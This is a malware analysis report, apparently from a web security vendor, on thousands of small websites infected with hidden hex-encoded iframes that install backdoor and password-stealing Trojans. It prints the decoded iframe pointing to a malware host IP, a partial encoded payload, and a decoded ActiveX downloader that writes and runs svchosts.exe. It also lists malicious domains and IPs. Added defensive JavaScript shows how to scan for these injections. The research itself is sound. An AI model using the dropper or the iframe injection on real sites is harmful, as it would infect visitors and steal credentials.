Long Tail Sites Come Under Attack

Thousands of middle-tier websites have been compromised with malicious iframes which load exploit code designed to surreptitiously install backdoor Trojans onto susceptible victim computers. If a webmaster's system is infected, the Trojans attempt to steal FTP credentials, which are then used to compromise additional sites and host servers. As a result, the number of compromised sites is increasing exponentially. These sites comprise the so-called 'long tail' of the web: while none of the sites is individually high volume, collectively they garner substantial visitors. Currently, one in every two ScanSafe customers attempts to access the impacted sites. Much of the traffic being directed to the compromised sites arrives via search engines. In some cases, the onset of the compromise was immediately followed by sponsored ad placement, indicating the possibility that the attackers were actively seeking to attract visitors to the affected sites. As an example, the website watchmaster.org was compromised and subsequently heavily advertised via sponsored links appearing on Nextel, shopping.aol.com, bizrate, and similar ecommerce sites. Following is an example screenshot of one such advertisement:

Note: According to Google, only 186 sites linked to watchmaster.org, and most or all of these appeared to be related to the placement of the sponsored links:

In each attack, the compromised site is outfitted with a hexadecimal-encoded iframe which, when decoded, has a format like the following (# marks values that vary from site to site):

window.status='Done';document.write('<iframe name=#### src=\'URL?'+Math.round(Math.random()*######)+'##\' width=### height=### style=\'display: none\'></iframe>')

In nearly all cases, the malicious iframe is appended to the page after the closing <html> tag. Following is a partial example of the hex-encoded script:

<script>eval(unescape("6964%6f2e%7361753d44%6f65%2764636d%6574%2e72%6965%283c%69726d2061%6d3d%3839303064622072%635c%27%6874%702f

Because the hex-encoded iframe sits after the closing html tag (</html>), the compromise may not be detected by some web spiders/crawlers, including many of those used for security purposes, which stop processing at the end of the document. The screenshot below shows the results in Yahoo (which uses web crawling and community-based reporting for SearchScan). As seen, Yahoo's SearchScan is unable to detect the malware embedded in the marlinatlantis.com site:

The following screenshot shows the same search results using Scandoo, which scans search results in realtime and is able to detect the embedded malicious iframe:
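The decoding and the crawler blind spot described above can be checked directly in the raw markup rather than in the rendered page. The following is an added example and is not code from the original report or from ScanSafe: it builds a constructed page with an eval(unescape("...")) dropper appended after </html>, decodes the payload with the same semantics as the legacy unescape(), and reports the iframe host, whether the iframe is hidden, and whether the injection sits past the closing html tag. The iframe text follows the decoded form shown later in the report; the page body, the function names and the record fields are this example's own.

```javascript
// Added example (not from the original report): decode a hex-escaped
// eval(unescape("...")) injection and report where on the page it sits and
// what it writes. SAMPLE_PAYLOAD is constructed for this example in the
// decoded form the report shows (a hidden iframe whose src is spliced from a
// literal prefix plus a Math.random() cache-buster).
const SAMPLE_PAYLOAD =
  "window.status='Done';document.write('<iframe name=7a src=\\'http://88.255.74.226/pack/index.php?'" +
  "+Math.round(Math.random()*174915)+'3387323df\\' width=507 height=345 style=\\'display: none\\'></iframe>')";

// Attacker-style encoding: every character as %xx, which unescape() reverses.
function hexEscape(s) {
  return Array.from(s, (ch) => '%' + ch.charCodeAt(0).toString(16).padStart(2, '0')).join('');
}

// Same semantics as the legacy unescape(): %xx and %uXXXX sequences are
// decoded; anything else, including malformed % runs, is left untouched.
function hexUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (_, u, b) =>
    String.fromCharCode(parseInt(u || b, 16)));
}

// A minimal "compromised" page (constructed): the dropper is appended after
// </html>, where the report says it is found in nearly all cases.
function buildSamplePage() {
  const page = '<html><head><title>Watches</title></head><body><p>Welcome</p></body></html>';
  return page + '\n<script>eval(unescape("' + hexEscape(SAMPLE_PAYLOAD) + '"))</script>\n';
}

// Scan the raw markup (not the DOM) for eval(unescape("...")) scripts, decode
// each one, and pull out the iframe it writes. Returns one record per injection.
function findHiddenIframes(html) {
  const htmlClose = html.search(/<\/html\s*>/i);
  const evalRe = /eval\s*\(\s*unescape\s*\(\s*(["'])([^"']*)\1\s*\)\s*\)/gi;
  const found = [];
  let m;
  while ((m = evalRe.exec(html)) !== null) {
    const decoded = hexUnescape(m[2]);
    // The src is assembled from a literal prefix plus a random number, so the
    // literal prefix (up to the next quote or backslash) is the stable URL.
    const src = /<iframe[^>]*src=\\'([^'\\]+)/i.exec(decoded);
    if (!src) continue;
    found.push({
      host: new URL(src[1]).hostname,
      src: src[1],
      hidden: /display\s*:\s*none/i.test(decoded),
      // True when the script starts after </html>: a crawler that stops at the
      // end of the document never sees it.
      afterHtmlClose: htmlClose !== -1 && m.index > htmlClose,
    });
  }
  return found;
}

function scanSamplePage() {
  return findHiddenIframes(buildSamplePage());
}

console.log(JSON.stringify(scanSamplePage(), null, 2));
```

Running the scanner over the constructed page yields one record for host 88.255.74.226 with hidden and afterHtmlClose both true; a scanner that parses the DOM and stops at </html> would report nothing, which is the gap the report describes.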

Various malware host domains are involved in the compromise. A sample of the domains and IP addresses directly or indirectly related includes:

58.65.232.33
81.29.241.70
64.46.39.14
64.28.187.29
ikarus-security.com
traffurl.ru
x-victory.ru

The core malware hosts demonstrate specific behavior that indicates they are directly related to one another. In an attempt to avoid suspicion, the malware sites are sporadically unavailable. When live, they return a bogus 404 (page not found) message which contains hidden and heavily obfuscated malicious script. A sample of the bogus 404 page containing the obfuscated script is seen in the screenshot below:

The decoded version is as follows:

window.status='Done'; document.write('<iframe name=7a src=\'http://88.255.74.226/pack/index.php?'+Math.round(Math.random()*174915)+'3387323df\' width=507 height=345 style=\'display: none\'></iframe>')

The IP address resolves to an international route block in Turkey. At the time of investigation, the site targeted by the iframe was not reachable.

When the obfuscated script is decoded further, the result is the following downloader (the first CreateObject line is truncated in the captured sample):

gogogo();
function gogogo() {
  // An <object> element whose CreateObject() method is used to instantiate
  // COM objects from script.
  var sende = document.createElement('object');
  sende.setAttribute('id','sende');
  try {
    // Object names are split into concatenated fragments to evade simple
    // signature matching. This line is truncated in the captured sample.
    var asq = sende.CreateObject('ms'+"xm"+'l2'+"
    // Shell.Application launches files; ADODB.Stream writes binary data to disk.
    var ass = sende.CreateObject("Shell.Application",'');
    var asst = sende.CreateObject('adod'+"b."+'st'+"re"+'am','');
    try {
      asst.type = 1;                      // binary stream
      asq.send(); asst.open();            // fetch the payload, open the stream
      asst.Write(asq.responseBody);       // copy the HTTP response body into it
      var imya = './/..//svchosts.exe';   // svchost look-alike name, one directory up
      asst.SaveToFile(imya,2);            // 2 = overwrite an existing file
      asst.Close();
    } catch(e) {}
    try { ass.shellexecute(imya); } catch(e) {}  // run the dropped executable
  } catch(e) {}
};
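The downloader above hides the COM objects it needs by splitting their names into concatenated string fragments. The following is an added example, not code from the original report or from ScanSafe: it folds such concatenations back into single literals and then flags the download-write-execute chain (ADODB.Stream, SaveToFile of a .exe, ShellExecute via Shell.Application). SAMPLE_DROPPER is reconstructed from the listing's pattern for illustration, with the truncated MSXML line omitted, and is not a captured file; the indicator names, the verdict rule and the function names are this example's own.

```javascript
// Added example (not from the original report): fold split string literals
// and flag the COM objects, file write and execution calls they resolve to.
// SAMPLE_DROPPER is reconstructed from the dropper's pattern, not captured.
const SAMPLE_DROPPER = `
function gogogo() {
  var sende = document.createElement('object');
  sende.setAttribute('id', 'sende');
  var ass = sende.CreateObject("Shell.Application", '');
  var asst = sende.CreateObject('adod' + "b." + 'st' + "re" + 'am', '');
  asst.type = 1;
  var imya = './/..//svchosts.exe';
  asst.SaveToFile(imya, 2);
  asst.Close();
  ass.shellexecute(imya);
}`;

// One single- or double-quoted string literal with no newline inside it.
const LITERAL = `(?:'[^'\\n]*'|"[^"\\n]*")`;

// Rewrite every run of two or more literals joined with '+' into one literal,
// so 'adod'+"b."+'st'+"re"+'am' becomes 'adodb.stream'. Code outside a run is
// left untouched.
function foldConcatenations(src) {
  const run = new RegExp(`${LITERAL}(?:\\s*\\+\\s*${LITERAL})+`, 'g');
  const one = new RegExp(LITERAL, 'g');
  return src.replace(run, (m) =>
    "'" + m.match(one).map((p) => p.slice(1, -1)).join('') + "'");
}

// ProgIDs passed to CreateObject(...) in the folded source, in order.
function createObjectTargets(folded) {
  const re = /CreateObject\s*\(\s*(['"])([^'"]*)\1/gi;
  const out = [];
  let m;
  while ((m = re.exec(folded)) !== null) out.push(m[2]);
  return out;
}

// Indicators of the chain the dropper uses (names chosen for this example).
const INDICATORS = [
  { name: 'ADODB.Stream',      re: /adodb\.stream/i },        // byte stream to disk
  { name: 'Shell.Application', re: /shell\.application/i },   // launches the file
  { name: 'SaveToFile',        re: /\.SaveToFile\s*\(/i },
  { name: 'ShellExecute',      re: /\.shellexecute\s*\(/i },
  { name: 'exe-on-disk',       re: /['"][^'"]*\.exe['"]/i },
];

function analyzeDropper(src) {
  const folded = foldConcatenations(src);
  const hits = INDICATORS.filter((i) => i.re.test(folded)).map((i) => i.name);
  // Verdict: bytes written to disk, saved under a .exe name, then executed.
  const verdict = ['ADODB.Stream', 'SaveToFile', 'ShellExecute', 'exe-on-disk']
    .every((n) => hits.includes(n));
  return { folded, progIds: createObjectTargets(folded), hits, verdict };
}

console.log(JSON.stringify(analyzeDropper(SAMPLE_DROPPER), null, 2));
```

Folding runs before matching, so the indicator patterns can use the plain ProgID strings even though the dropper never contains them contiguously; a page that merely concatenates harmless strings folds cleanly and produces no hits.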

Successful exploitation leads to the installation of a variant of the Zapchast backdoor and Ldpinch password-stealer Trojan families.

The backdoor gives attackers full access to the compromised systems, after which they are able to take any action on the computer that the logged in legitimate user could perform.

The password stealer captures (among other things) any FTP credentials it finds, which are then used by the attacker(s) to compromise additional websites and web servers. This leads to exponential growth in both the number of compromised sites and the number of victim computers outfitted with backdoors and password stealers.

According to geo-data captured during the course of the compromises, the United States (83%) and the United Kingdom (8%) account for the largest shares of victims:

UNITED STATES 83%
UNITED KINGDOM 8%
GERMANY 2%
NETHERLANDS 1%
RUSSIA 1%
THAILAND 1%
SPAIN 1%
CZECH REPUBLIC 1%

Growth of the attacks can be seen in the charts below:

This form was completed by: Mary Landesman
